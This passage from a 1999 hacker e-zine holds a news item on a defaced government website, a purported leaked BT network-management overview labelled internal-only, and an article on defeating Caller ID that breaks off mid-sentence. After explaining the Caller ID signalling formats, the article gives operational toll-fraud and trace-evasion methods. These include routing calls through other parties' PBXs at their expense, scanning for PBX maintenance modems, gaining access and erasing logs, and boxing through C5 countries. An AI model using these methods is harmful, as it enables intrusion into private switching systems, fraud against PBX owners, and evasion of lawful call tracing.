originated from a dial-up user in the US in the early
hours of Wednesday morning. This is the second time in
two months the site has been defaced, despite the fact
that a private company was called in to provide a
firewall and surveillance after the first defacement.
Africa News
http://www.africanews.org/south/southafrica/stories/19991104_feat12.html
South Africa
Statistics website hacked again despite surveillance
Business Day (Johannesburg)
November 4, 1999
By Pamela Whitby
Johannesburg - An investigation into the latest attack on Statistics
SA's website has revealed that the hack originated from a dial-up
user in the US in the early hours of yesterday morning.
This is the second time the website has been hacked into in two
months, despite Statistics SA contracting a private sector company
to provide a firewall and surveillance.
Statistics SA head Mark Orkin said: "This hack is completely
unrelated to the previous one a few weeks ago."
An intrusion detection signal was recorded, but before it was picked
up the hacker managed to bypass the administrative protection on
the server." While investigating the hack, it was discovered that
government sites worldwide are broken into at least 200 times a
day. The logs of government websites in SA show these are hacked
into two to three times a day.
There was a trade-off between security and accessibility, Orkin
said. "We need to offer convenient access for hundreds of genuine
visits daily, so we have tried to increase security without obstructing
visitors."
The organisation is investigating extra security and will keep the
website disconnected from its core systems. The site is hosted on a
stand-alone server "so no core databases or archives were
affected".
@HWA
43.0 BT Network Admin Support System Development SYSTEM X and OMC network ops by Hybrid
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hybrid.dtmf.org/
_\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_
BT Network Administation Support System Development
SYSTEM X and OMC network operations..
BT PhoneBone tekniq By hybrid <hybrid@dtmf.org>
NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez. [ _\|/_ ]
| GBH |
: :
. .
PART I (Introduction to BT managment on the PSTN)
Introduction
The technology within the network has advanced through digitalisation of
both transmission and switching, and the introduction of computer contolled
network elements. The greater reliability of this technology and the ability
to manage and configure the elements remotely has created new opportunities
for efficiant managment of the network.
These opotunitys have been translated into a vision for the future operation
and managment of the network, initially through the Network Administration
Task Force (NATF) and subseqent refinements in terms of architecture (Network
Managment Architecture), and process (Strategic Systems Plan (SSP)).
THE VISI0N
The vision can be summerised as:
-+ end-to-end network managment
-+ functioncal coverage of the whole network life cycle
-+ fully integrated functionality
-+ high levels of automation/decision support
-+ conformant to architectual objectives:
a) network managment hierarchy
b) co-operative network architecture
c) open systems platform
End-to-End managment
It is essential to be able to manage networks made up of elements from
different vendors and different generations of equipment in a consistant
manner, so that the network can be viewed as a complete entity which provides
a managed service platform.
Whole Life Cycle
Networks and services must be managhed from 'cradle to grave' (figure 1),
covering:
-+ forecasting
-+ requirments analysis
-+ detailed dimensioning and project planning
-+ data building
-+ installation and commisioning
-+ maintenance/billing/traffic managment
-+ repair
-+ performance
-+ enhancment/withdrawal
future service | pre-service
|
|
requirments | data building
O
forceasting / \ installing
/ \
performance / \ commissioning
/\ \/
/ \
FIGURE 1 / \ NETWORK AND
/ \ SERVICE LIFE
O---------------<---------------O CYCLE
/ \
/ \
/ statistics billing maintenance \
traffic managment repair
Hands free operation
It is essensial to give network managers a high level of automation in order
to eneable them to cope with the levels of complexity involved, vast amounts
of data, apparently random nature of problems, and the need for speed,
accuracy and consistancy in decision making. This requires:
-+ incidents to be analyised automatically with the manager's concurance
being sought to the solution offered;
-+ automatic restoration of service to be achived whenever possible;
-+ jobs depached to the workforce based on an optimum approach to jeopardy,
costs, tactics and company image.
-+ customers notification of service affected generated automaticaly to the
approproate customer-facing unit; and
-+ performanace statistics kept and analysed on all key proccesses.
Development challenges
The challenge for the system developers is to be responsive and meet new
requirments quickly, while producing enduring systems which fit within an
integrated set-the jigsaw-- the whole evolving towards the Network
Administration Implementation Program (NAIP) and SSP vision in a cost
effective manner.
The developers have to move from a possision of well over 200 systems, most
of which do not interwork, and many of which no longer offer all the
essensial fucnctions, to a set of around 40 fully integrated high
functionality key systems.
Functions must be brought into line with the required buisness proccesses and
must evolve to match the demands of new network technologys, for instance,
planning rules for fibre systems must be continually reviwed to encompass
increasing capacities and repeaterless operation.
Systems must also take account of the changing operational organaisations
and procedures, framework which can evolve without damaging the software
investment already made. Solutions have to be achived within four planes of
change as illustrated in figure 2.
-+ linked planes of change
+--------+ +------------------------------------------+
| | | | -+ people
| | | | -+ groups/duties
| N O-><-O-- | -+ skillz
| | | USER ORGANISATION | -+ procedures
| E | +-------------------o----------------------+
| | |
| T | +-------------------|----------------------+
| | | | | -+ maintainence
| W | | : | -+ planning
| O-><-O-- | -+ repair control
| 0 | | NETWORK MANAGMENT FUNCTIONS | -+ traffic/control
| | +-------------------o----------------------+ -+ data building
| R | |
| | +-------------------|----------------------+
| K | | | | -+ computers
| | | : | -+ terminals
| O-><-O-- | -+ database
| | | COMPUTING AND HOST ARCHITECTURE | -+ etc.
+--------+ +------------------------------------------+
PART II (Adminstration of BT Network layers) ohday.
-+ Interface Architecture
The interface architecture provides the means to link all the pieces of the
jigsaw together. By a mix of Open Systems Interconnection (OSI) products and
pragmatic proprietry products, (for example, SNA, DECNET), a communications
infastructure will be deployed to connect users to systems, systems to other
systems for information sharing, and systems to the network elements they are
managing. Key standards for these interfaces are being defined in the Co-
Operative Networking Architecture (CNA-M) prgramme.
-+ Data Architecture
Data architecture offers the ability to standardise what the processes need
to talk about. Defining the structure and format of the key information
items provides a common currency which may be shared by the complete family
of support systems. The object orientated style of the CNA-Managment
communications protocols will ofrce the standardisation of objects as well
as simple data structures in the CNA-M programme and external standards
bodies like ISO, CCITT and the OSI Network Managment Forum.
-+ System (Computing) Architecture
The system architecture defines how a particular system is constructed,
rather than the fucntional role it plays within the jigsaw. This deals with
the following main conponments.
-+ computer hardware
-+ operating system
-+ database managment system
-+ transaction proccessing
-+ communications drivers
-+ man -- machine interfacing (MMI), and
-+ application programming interface (API).
There is a drive by the computing industry to create standard open interfaces
to these elements, based on UNIX/POSIX and X Open standards to produce the
open platform. The system developers are also driving towards reusable sub-
functions and utilities. These two initiiatives are being bought together
in the Generic Systems Architecture (GSA).
-+ Integration and evolution
SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture
Board (NCAB) 5 year vision for support systems evolution have all
contibuted to creating a clear picture of how support systems will look in
the future. It is important, however, that a very pragmatic approach is taken
to realising this vision.
-+ SWITCH MANAGMENT
BT switch managment is carried out by the OMC (Operations Maintanace
Center) for local exchanges and the operations and maintanance unit support
system (OMUSS) (an OMC derivative) for trunk exchanges. This system has
clocked up over 3000 system months of reliable service sinse its introduction
n 1984. As the first majour network managment system, it has paved the way
for the NACC/NOU structure.
+-------------+ +---------+ +-----------+
| |<-----------------. | NMW2 | | |
| CSS |<---------. | +---------+ | DCSS |
+-------------+ | : | |
| +--:-------------+ +-----------+
| | |
| | NOMS 2 |-------------------.
: | | |
: +-/--------/--|--+ +-----:-----+
.- - - - - : - -/- -. / | | |
| : / | / | | NOMS 1 |
:/ :/ :/ : | |
+------+ +---/--+ +--/---+ +---:--+ +-----------+
| | | | | | | | | | | |
| FAS | | OMC | | TMS | | OMUSS| : : : :
+------+ +------+ +------+ +------+ ALARMS
:\ :\ :\ :\
| | | |
| : | :
| .----------. | .----------. .----------.
.--------. | | | | | | | |
| | : | | : | | | INTER- |
| HOUSE O=========O LOCAL O=========O TRUNK O=========O NATIONAL O===
|________| | | | | | |
|____:_____| |____:_____| |__________|
: \ / : ______
: \ / : | |
: x : |______|
: / \ :
.----:-----./ \.----:-----.
| | | |
| | | |
| DDC |-------->| DESS |
| | | |
|__________| |__________|
-+ CSS : Customer Service System
-+ NMW2 : Network Managment Workstation
-+ DCSS : District Control Support System
-+ NOMS : Network Operations Managment System
-+ FAS : Fibre Access System
-+ OMC : Operations and Maintanance Center
-+ TMS : Transmission Monitoring System
-+ DDC : District Data Collector
-+ DESS : Digital Exchange Support System
-+ OMUSS : Operations and Maintenance Unit Support System
There are over 60 systems in field serivce, with over 10,000 registered
users, covering all trunk and local System X and AXE switches. Enhancment
continues to run at a considerable pace, working its way into the field
through two major realeses per year.
+------------+ +--------+ +------------+
| EXCHANGE A |<----------| |<------------| EXCHANGE Z |
| |---------->| |------------>| |
+------|-----+ +----|---+ ^ +------|-----+
| | | |
==============|======================|=========|==============|=============
: : : :
+------:-----+ +---------:---------:---+
| ALARMS HAN | | | +---
| DELING SYS |<-----| O M S |----->| O-O
+------:-----+ | | +---
: | |
| | | +---
| | SRS LECS |----->| |_\
| | | +---
+----:----+ | |
|TERMINAL | | USER FACLITYS/DUTIES | +---
|DISPLAY | | DEC VAX H/W |----->| ( )
+---------+ +-----:---:---:---:-----+ +---
| | | |
| | | |
A) ADMINISTRATION USERS / / \ \
B) MAINTANENCE USERS | | | |
C) REMOTE USERS ^ ^ ^ ^
D) OTHER SYSTEMS A B C D
-+ OMS : Operational Maintanence System
-+ SRS : Subscribers Record System
-+ LECS : Local Equipment Computer System
The system is based on a VAX/VMS platform with Oracle relational database,
its pwn basic forms/menus man --machine interface and X.25/V.24
communications drivers. The Exchange interfaces are conrolled through
flexable data-driven translators and the basic structure of the system is
highly modular. The priority evolution steps for OMC are:
-+ interoperability with CSS, the transmission network survailance (TNS)
system and workforce managment (NOMS2)
-+ additional exchange interfaces for advanced services unit (ASU) etc.,
-+ adoption of advanced workstation (NMW2) man --machine interfacing
-+ donation of functions to Generic Event Managment (GEMS).
-+ Transmission Managment
The transmission monitoring system (TMS) provides a comprehensive survailence
system for the transmission aspects of the network. While the OMC manages a
smaller set of complex network elements, the TMS faces the challenge of
collecting, collating and displaying information from a vast array of
physically dispersed conponments. After field-trial stages and recent
product trials in London, the TMS is now being rolled out into the three
pilot NOU catchment areas. The major TNS functions are:
-+ alarm reception, display, filing, retrival and archiving
-+ alarm association and comparason;
-+ performance data proccessing and display
-+ access to other systems (for example, the junction network system (JNS)
database)).
-+ Local Access Managment
The flexible access system (FAS) is a system which has been developed to
manage fibre in the local loop. Systems have been installed for the City
Fibre Network and Docklands. The support system, the service access control
center (SACC), once more shares a common lineage and technology platform with
OMC combined with the ICENI database produced by NMD, and used as an
element in the service desk and facilies managment systems. FAS was the first
system to attempt to adopt the network managment hierarchy, with well
defined interfaces between the service access control center (SACC) (network
level controller) and element managers developed by equipment supplyers. It
also adopted the network managment workstation (NMW1) to remove a multitude
of various terminals.
Until the future of the FAS is fully determined, the SACC will not be
enhanced and evolved. However, the structure of future advanced local access
managment is being considered based on experience of FAS, LLOFT (the local
loop optical fibre trial) and cable TV managment.
-+ Data managment and performance analysis
The digital exchange support system (DESS) consists of many applications
which are grouped together under a single code name. Some of the functions
these appications perform are:
-+ data build for new exchanges and major upgrades
-+ generic network performance statistics by analysiing the large volume of
data generated bt switches
-+ providing national reference source for charging information, and
associated validation tools to ensure charging integrety
-+ provding a database and tracking mechanism for all exchange insident
reports; and
-+ a register of the hardware and software build levels for all exchanges in
the network.
DESS is a major system which runs on the largest VAX cluster configurations
in the world. It supports a population of 2000 users, 140 of which may be
similtaniously logged into the system. A typical daily workload for DESS
would be analysing 1-4 Gigs of exchange generated data, producing 35
thousand pages of printout, and writing or reading 1500 exchange cartridges.
COMMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS.
.
.
:
|
+----+ GBH -+o
|
+----> psyclone -+o +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+--
+----> hybrid -+o +[ GWAHN BURN'IN H4X0RZ ]+--
+----> gr1p -+o
+----> kp -+o-----+[ _\|/_ ]
| |
: :
. .
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+
@HWA
44.0 Defeating the Caller ID system by Hybrid
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hybrid.dtmf.org/
-o[ Defeating the Caller ID system ]o-
-o[ D4RKCYDE ]o-
-o[ by hybr1d <hybrid@dtmf.org> ]o----------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Defeating The Caller ID System
With Simple but Effective Stealth.
July 1999.
hybrid (hybrid@dtmf.org)
(http://hybrid.dtmf.org)
quick disclaimer: I do not encourage any of the information provided in this
file. I, or f41th cannot be held responcerble for your use of the information
provided in this article, it has been provided for informational purposes
only.
(introduction)
CallerID (CID) or CND (Calling Number Delivery), is an extension to the
widley used ANI (Automatic Number Identification) system. The telcos use ANI
as a means for billing information when you make a toll-call, however dispite
what alot of people think, ANI is not used as part of the CID system, it was
the first system used to allow the recieving party know who was calling and
was widely used before the advent of the SS7 telephony protocol, but sinse
the implementation of SS7 CID/CND has become popular, both in residential
subscriber loops, and commercial lines. In this file I am going to show how
the CID/CND system works, specific to different *bell specifications aswell
as the differences in other countrys, such as the UK. Before we go any
further, you need to know the basics of the *bell CID protocol;
CID information (data) is transmitted on the subscriber loop using a method
known as FSK (Frequency Shift Keyed) modem tones. This data is transmitted in
ASCII format and contains the information needed to display the CID mesage at
the terminating line. The actual data burst occurs between the first and
second ring of the line, and contains basic information about the originating
point of the call, such as the date, time, and of course the calling number.
On more upto date systems, or in a local area, the name of the caller will be
displayed next to their number aswell. Further advances in CID include a new
system called CIDCW or (CID on Call Waiting), where the call waiting tone is
heard and the CID of the second calling person is exposed.
(definition)
As I said before, Caller ID is the identification of the originating
subscriber line. For example, say you had a line installed under your own
name, your details would be stored alongside your line information in your
telcos directory listings. So when you call someone with a CID unit that
displays the calling partys name, your name would be displayed alongside the
number, or whoever pays the bill for the line. Obviously the telco has no
real way of knowing just _who_ is making the call, so the term Caller ID
would be inapropriate, and should technically be refered to as Calling Number
Identification because it is the name of the person associate with the line
rental, and not your docs that are transmitted. The actual CID information is
transmitted to the terminating subscriber loop, as I said before, between
the first and second ring implementing a bell202 type modem specification.
There are 2 tones that are tranmitted, one of them contains the mark
transmission (logic 1) and the other contains the space transmmision (logic
0), mark and space. The transmitted message contains a channel seizure string
and then a mark string followed by the actual caller information. If the
recieving line only has basic CID information installed (where they only
recieve the date, time and number of the caller) SDMF (Single Data Message
Format) is used in the CID data burst. If however, the recieving person has
a more advanced version of CID where they can see the name of the person
calling, MDMF (Multiple Data Message Format) is used in the data burst. If
the MDMF method is used, and you have withheld your CID, the recieving line
will only see a message saying the information was blocked by the caller, or
is unavailable. Later I will discuss ways of making your line information
completly unavailable to the called party.
In New Jersey 1987, the first CID service was offered to subscribers of
NJBell because NJBell where at that time implementing new high-speed networks
and wanted to rake in a little more money by offering this new service to its
customers. Before SS7 ANI was used as a means of obtaining the calling number
info as a means for billing purposes on certain lines. Before SS7, your ANI
would go no furthur than your central office, and would not be forwarded to
international calls. However, that was then and this is now, SS7 has been
implemented big time over the international/national PSTN (Public Switched
Telephone Network) and ANI can be a phreaks worst enemy. These days ANI
information can be transmitted internationaly, and in some cases globably,
depending on the similaritys of the concerned signalling/switching systems.
Numbers that are renowned for implementing full ANI capture are 800 and 900
services (full SS7 based) aswell as operator services, and of course 911.
ANI is _completly_ different from CID, so if you call a line that has an ANI
service installed, you will not be able to block your line information from
going through as ANI works on a different protocol than CID, ie, the *
services used to withhold your CID wont work on an ANI system because they
are designed _only_ for blocking of CID _not_ ANI, remember they are
completly different things. There are alot of rumours that I have heard from
people about ANI, such as its supposid ability to capture your line
information, which ever method you use to call a number. The fact is, ANI is
dependant on SS7, which in turn is dependant on translation tables, who says
you have to use the SS7 network to call someone ;> I'll go into this further
later in this file.
Now, back to CID; Because of the mass implementation of the SS7 protocol, CID
informaion is transmitted to the called party's central office. This is done
using SS7, and is called CPNM or (Calling Party Number Message). Now, heres
the bitch of SS7; when you call someone, your line informaion is sent to the
persons central office _regardless_ of the fact that you may have reqested
that your line informaion is withheld. If you have withheld your CID, the
remote person's central office still get your line information, but notices
that you reqested that your info is withheld (UNLESS the person you are
calling has a deal with their local telco to expose any CID information held
at their central office to be automaticaly transmited to their CID unit,
Thats where things begin to get nasty (at the end of the day, the telcos are
more concerned about the money they are recieving for providing _full_ CID
services to people, and could'nt care less if you reqested your line
informaion remains private).
(lets get technical) -- exphunged from CallerID specifications
by Michael W. Slawson
Eventually standard CID (SDMF) where only the calling number and date etc are
displayed will be completly phased out and replace by the enhanced CNAM
(Calling Name Delivery) where the MDMF data burst transmission is used.
The CID information is sent serially at a rate of 1200 bits per second using
continuous-phase binary frequency shift keying for modulation. The two
frequencies used to represent the binary states are 1200 Hz for the Mark
(logic 1) and 2200 Hz for the Space (logic 0). The data is sent
asynchronously between the first and second ring at a signal level of -13.5
dBm. The level is measured at the central office across a 900 ohm test
termination.
Following a minimum of 500 ms after the end of the first ring, the sequence
of transmission begins with a Channel Seizure. The Channel Seizure is a
string of 300 continuous bits (250 ms) of alternating "0"s and "1"s. This
string starts with a "0" and ends with a "1". A Mark Signal of 180 mark bits
(150 ms) is sent immediately following the Channel Seizure Signal. The
purpose of the Channel Seizure Signal and the Mark Signal is to prepare the
data receiver in the Customer Premise Equipment (CPE) for the reception of
the actual CID transmission.
Once the Channel Seizure and Mark Signals have been sent the CID information
is then transmitted starting with the Least Significant Bit (LSB) of the most
significant character. This is true for both SDMF and MDMF. Each character
in the message consists of 8 bits. For displayable characters these bits
represent a code defined by the American Standard Code for Information
Interchange. When transmitted the character's 8 bits are preceded by a start
bit (space) and followed by a stop bit (mark) giving a total of 10 bits sent
for each character. The CID information is followed by a checksum for error
detection. Figure 1 shows a visual layout depicting the association of the
1st Ring, Channel Seizure Signal, Mark Signal, Caller ID information,
Checksum, and the 2nd Ring.
The checksum word is a twos complement of the modulo 256 sum of each bit in
the other words of the message. The Channel Seizure and Mark Signals are not
included in this checksum. When the message is received by the CPE it checks
for errors by taking the received checksum word and adding the modulo 256 sum
of all of the other words received in the message. The addition done by the
CPE does not include the Channel Seizure and Mark Signals, nor does it
include the received checksum word. The result of this addition should be
zero to indicate that no errors have been detected.
Figure 2 shows a CID message in SDMF. For ease in describing the process of
determining the checksum, the decimal values will be used for the
calculations.
Character Decimal ASCII Actual
Description Value Value Bits (LSB)
- ------------------- ------- ----- ---------------
Message Type (SDMF) 4 0 0 0 0 0 1 0 0
Message Length (9) 18 0 0 0 1 0 0 1 0
Month (December) 49 1 0 0 1 1 0 0 0 1
50 2 0 0 1 1 0 0 1 0
Day (25) 50 2 0 0 1 1 0 0 1 0
53 5 0 0 1 1 0 1 0 1
Hour (3pm) 49 1 0 0 1 1 0 0 0 1
53 5 0 0 1 1 0 1 0 1
Minutes (30) 51 3 0 0 1 1 0 0 1 1
48 0 0 0 1 1 0 0 0 0
Number (6061234567) 54 6 0 0 1 1 0 1 1 0
48 0 0 0 1 1 0 0 0 0
54 6 0 0 1 1 0 1 1 0
49 1 0 0 1 1 0 0 0 1
50 2 0 0 1 1 0 0 1 0
51 3 0 0 1 1 0 0 1 1
52 4 0 0 1 1 0 1 0 0
53 5 0 0 1 1 0 1 0 1
54 6 0 0 1 1 0 1 1 0
55 7 0 0 1 1 0 1 1 1
Che
cksum 79 0 1 0 0 1 1 1 1
The first step is to add up the values of all of the fields (not including
the checksum). In this example the total would be 945. This total is then
divided by 256. The quotient is discarded and the remainder (177) is the
modulo 256 sum. The binary equivalent of 177 is 10110001. To get the twos
compliment start with the ones compliment (01001110), which is obtained by
inverting each bit, and add 1. The twos compliment of a binary 10110001 is
01001111 (decimal 79). This is the checksum that is sent at the end of the
CID information. When the CPE receives the CID message it also does a modulo
256 sum of the fields, however it does not do a twos complement. If the twos
complement of the modulo 256 sum (01001111) is added to just the modulo 256
sum (10110001) the result will be zero.
If the result is not zero then the message is discarded. It is important to
note that there is no error correction in this method. Even if the CPE were
to notify the central office of errors, the central office will not
retransmit the information. If an error is detected, the CPE receiving the
message should display an error message or nothing at all. Although Bellcore
SR-TSV-002476 recommends that the CPE display an error message if erroneous
data is received, most CPE manufacturers have elected to just ignore the
errored message.
The content of the CID message itself depends on whether it is in SDMF or
MDMF. A message in SDMF includes a Message Type word, a Message Length word,
and the actual Message words. A message in MDMF also includes a Message Type
word, a Message Length word, and the actual Message words, but additionally
includes Parameter Type and Parameter Length words. There are certain points
within these messages where up to 10 Mark bits may be inserted to allow for
equipment delays in the central office. These Stuffed Mark bits are generally
not necessary.
The Message Type word defines whether the message is in SDMF or MDMF. It will
be a binary 00000100 (decimal 4) for SDMF or a binary 10000000 (decimal 128)
for MDMF. The Message Length will include the number of characters in the
message. This length does not include the checksum at the end of the message.
For SDMF the minimum length will be 9 characters. The minimum length for MDMF
will depend on whether the customer has subscribed to CNAM service as well as
CND. In the case of CND only the minimum length will be 13 characters. If the
customer also has CNAM then the minimum will be 16 characters. In all three
of the minimums mentioned there will be no actual number or name delivered.
The field will be marked either "O" (Out of area) or "P" (Private).
Figure 3 shows an example of a minimum message layout for SDMF. The number
will not be delivered because it has been blocked by the calling party. The
CPE will receive the date, time, and a "P" to indicate that the caller's
identification has been blocked at the caller's request.
Character Decimal ASCII Actual
Description Value Value Bits (LSB)
- ------------------- ------- ----- ---------------
Message Type (SDMF) 4 0 0 0 0 0 1 0 0
Message Length (9) 9 0 0 0 0 1 0 0 1
Month (December) 49 1 0 0 1 1 0 0 0 1
50 2 0 0 1 1 0 0 1 0
Day (25) 50 2 0 0 1 1 0 0 1 0
53 5 0 0 1 1 0 1 0 1
Hour (3pm) 49 1 0 0 1 1 0 0 0 1
53 5 0 0 1 1 0 1 0 1
Minutes (30) 51 3 0 0 1 1 0 0 1 1
48 0 0 0 1 1 0 0 0 0
Private 80 P 0 1 0 1 0 0 0 0
Checksum 16 0 0 0 1 0 0 0 0
Character Decimal ASCII Actual
Description Value Value Bits (LSB)
- -------------------------- ------- ----- ---------------
Message Type (MDMF) 128 1 0 0 0 0 0 0 0
Message Length (33) 33 0 0 1 0 0 0 0 1
Parameter Type (Date/Time) 1 0 0 0 0 0 0 0 1
Parameter Length (8) 8 0 0 0 0 1 0 0 0
Month (November) 49 1 0 0 1 1 0 0 0 1
49 1 0 0 1 1 0 0 0 1
Day (28) 50 2 0 0 1 1 0 0 1 0
56 8 0 0 1 1 1 0 0 0
Hour (3pm) 49 1 0 0 1 1 0 0 0 1
53 5 0 0 1 1 0 1 0 1
Minutes (43) 52 4 0 0 1 1 0 1 0 0
51 3 0 0 1 1 0 0 1 1
Parameter Type (Number) 2 0 0 0 0 0 0 1 0
Parameter Length (10) 10 0 0 0 0 1 0 1 0
Number (6062241359) 54 6 0 0 1 1 0 1 1 0
48 0 0 0 1 1 0 0 0 0
54 6 0 0 1 1 0 1 1 0
50 2 0 0 1 1 0 0 1 0
50 2 0 0 1 1 0 0 1 0
52 4 0 0 1 1 0 1 0 0
49 1 0 0 1 1 0 0 0 1
51 3 0 0 1 1 0 0 1 1
53 5 0 0 1 1 0 1 0 1
57 9 0 0 1 1 1 0 0 1
Parameter Type (Name) 7 0 0 0 0 0 1 1 1
Parameter Length (9) 9 0 0 0 0 1 0 0 1
Name (Joe Smith) 74 J 0 1 0 0 1 0 1 0
111 o 0 1 1 0 1 1 1 1
101 e 0 1 1 0 0 1 0 1
32 0 0 1 0 0 0 0 0
83 S 0 1 0 1 0 0 1 1
109 m 0 1 1 0 1 1 0 1
105 i 0 1 1 0 1 0 0 1
116 t 0 1 1 1 0 1 0 0
104 h 0 1 1 0 1 0 0 0
Checksum 88 0 1 0 1 1 0 0 0
In Figure 4, if the number and name had not been included then the parameter
types for those fields would be different. These alternate parameter types
are used to signify that the data contained in that parameter is the reason
for its absence. The parameter type for the number section would have been a
binary 00000100 (decimal 4) and the parameter type for the name section would
have been a binary 00001000 (decimal 8). When the parameter type signifies
that the data contained is the reason for that fields absence, the parameter
length is always a binary 00000001 (decimal 1). If the reason for absence is
that the calling party does not want their number/name displayed then the
parameter data would be a binary 01010000 (ASCII "P") for Private. If the
reason for absence is that the information is just not available then the
parameter data would be a binary 01001111 (ASCII "O") for Out of area. The
number/name may not be available if the calling party is not served by a
central office capable of relaying the information on through the network.
(lets talk d1rty)
The above specifications are relevant to the US CID system, and not to the
UK specification. Enough of the technical stuff for now though, its time to
look at CID systems from an attack and deffense point of view. First the
real basics; if you are in US you can reqest that your CID is withheld by
using *67 as a prefix when dialing a number. As I said before though, this is
absolutly usless in completly withholding your CID because we know that CID
information is passed onto the called party's central office regardless of
*67 via implementation of the SS7 network. If you are in the UK you would
prefix your call with 141, but again our nice systemX digital exchanges a
real bitches at passing on our CID information to _other_ exchanges, so in
essance your call routing is loged as it passes through exchange boundarys on
the PSTN. So here I am going to discuss different techniques that can be used
to completly render your CID information useless as it is transmitted through
various excahanges and offices.
I'm going to begin with some basic concepts so you can understand the more
advanced techniques better. Now, lets consider this scenario for the
following techniques; You are in Texas (RBOC: SWBell) and you want to set-up
a call to someone in Chicago (Ameritech). Obviously, you know that *67 wont
help you if the person you are calling has full CID (or has access to there
central office ;>) so you consider the following techniques and call-setup
examples.
[ example A: simple diverting ]
Here you can use a host that will be traced back to in the advent that the
person has full CID. In other words, its real simple, you use a PBX
(preferably a long distance one located in another RBOC). This is very self
explanitory, but alot of people get it wrong. Heres how the call setup would
look in a metaphorical diagram:
______ ______ ______
| | | | | | (800)XXX-XXXX
| CO |------------->| CO |------->| PBX | POTS:(123)456-7890
|______| |______|<-------|______|
| |
| |
| __|___
( you ) | |
| CO |----------------------> ( them )
|______|
Now, whats happening here is you are calling the PBX at *671800XXXXXXX, you
then login to the PBX and from there you dial the person you want to call.
When the person checks there CID unit, they will see the number of the PBX
you are calling from instead of your actuall originating number. Now, this is
OK for very very very simple CID spoofing, but if the person you are calling
is resoursefull, they could very easily have words with the host from which
you where calling from (who would have your ANI -its an 800 number) The CO of
the PBX would also have the time, date, and trunk setup information for when
you called the PBX etc, so this example is still not quite as effective as
you would imagine it to be.
Now, to make a long story short, we can enhacne the above method by
implementing our _own_ CID blocking methods along the above routing example.
Look at the diagram in detail, and you will realise that there can be many
different alterations made that can make the routing alot safer, and _alot_
more hastle for them to pin-point your OCP, or originating point.
First we take into account the call we make to the PBX. For starters, you can
op-divert to the 800 number (depending on where you live) so the 800 PBX
recieves operator assisted call ANI instead of yours. This can be done very
easily, and involves you calling your local operator and asking them to call
the number for you. The central office located near to the PBX then has the
OPC of your operator, rather than you.
Now, the PBX host is your safgaurd when it comes to hiding your CID. For
those of you who dont know, all PBXs or privatly owned switching and trunking
mechanisms/systems log incomming and outgoing trunk setups for billing
purposses etc. These days, most PBX exchanges have administration modules
that deal with call routing. The call-setups are stored in the databases of
the PBXs and can be intercepted. Most of the time, a PBX will have 1 if not
several dialin modems that connect to the PBX administration modules for
remote maintanance. Its simply a case of internally scanning the extensions
of the remote PBX for a carrier, and checking out each one until you find
what you are looking for. Once you have access, you could do _many_ things
depending on how advanced the system is. For example, you could erase any log
of your connection to the PBX (aswell as any furture connections), you can
set up incomming and outgoing trunks on the PBX exchange that dont even
exist, you can also select which trunk you wish to call your party with and
therefore selecting which number you wish to be displayed to the called
party. I wont go into to much detail here, you get the picture right?
So now we are using a host to call through that will not log anything that
could point towards you, with the exeption of the timestamping at the central
officess along the routing path. (again, that could be delt with in a similar
fashion). You could also implement op-diverting from the PBX to the dialed
person, or triple the amount of hosts you use to place the call at the same
time using the above methods, but via more PBXs and operators.
In my opinion though, the above method is no way near as secure as you need
it to be, so in the next examples, we take adavntage of ld-carriers, and
global PSTN networks that do not co-operate with each other, ie: calling
party data is not translatable or transmitable (electromechanical).
Now, to really throw someone off track in the advent of a trace (realtime or
aftermath) we take advantage of one of the biggest flaws in the PSTN known
today: new digital exchange units such as digital ESS, systemX etc cannot
effectivly communicate with older lesser implemented electromechanical
exchanges such as crossbar, and CCITT#5 protocols implemented in lesser
developed countrys such as Indonisia, Libia etc. The worlds telcos are also
very lazy when it comes to passing on originating calling party information
from country to country, simply because it is to much hastle for them, time
and money runs into the picture once more. So ld call setups become a good
counter defense when it comes to routing un-traceable calls. Now, I can think
of literaly 100s of methods that could be implemented here, but I'm going to
discuss the structure of how this type of call would be setup, I'll leave the
rest to your imagination (if you have one)
[ example B: international routing ]
Now, consider the previous call setup example, and imagine how it would be
trunked if you placed a long distance barrier in-between. Here we will
imagine we have 2 PBXs, one in the US and one in the UK. Again, you are in
Texas and want to setup a call to someone in Chicago without revealing your
identity. The basic call setup would appear like this:
______ ______ ______
| | | | | | (800)XXX-XXXX
| CO |------------->| CO |------->| PBX | POTS:(123)456-7890
|______| |______|<-------|______|
| | ___
| [ US PSTN ] | ESS routing .--->|co |
| __|___ ____|_ |___|------ ( them )
( you ) | | | |
| CO |------->| DMS | (international DMS
|______| |______| gateway router)
:
:
:
[ super LD ] .........................\........................
\
:
So here you have op diverted :
to the US PBX, then from the :
US PBX op diverted and called ______ ___:__
the PBX in the UK, already | |------->| |
the UK PBX has lost the US | CO |<-------| DMS | (international DMS
PBXs CID, and from the UK PBX |______| |______| gateway router)
you call the person in chicago, |:
which in turn is re-routed back |:
through the international PSTN |: [ UK PSTN ] systemx routing
effectivly deteriating your __|:__
origionating line. | |
| PBX | (UK PBX)
|______|
The problem with this kind of routing example is that you are costing the 2
PBX exchanges involved big bux, and is generaly not a very nice thing to do,
heh. Again, as in the previous example, you can implement the PBX
administration for extra security, the above diagram could be used vise-versa
whether your origionating point was the UK or US. It is howver inconvinient,
both for you, and for the poor owners of the PBXs who have to falk out for
your toll-fraud adventures. There are however other ways of implementing the
above techniques.
Now, probably the most favourable technique to use would be to box your way
out of a country that runs C5, and from there re-route a call back to the US
and even implement a few PBXs along the way, therefore you would have [ 0 ]
CID worrys. A more advanced technique involves the forwarding of subscriber
lines to a designated number (A C5 country direct, PBX etc). Now, if you are
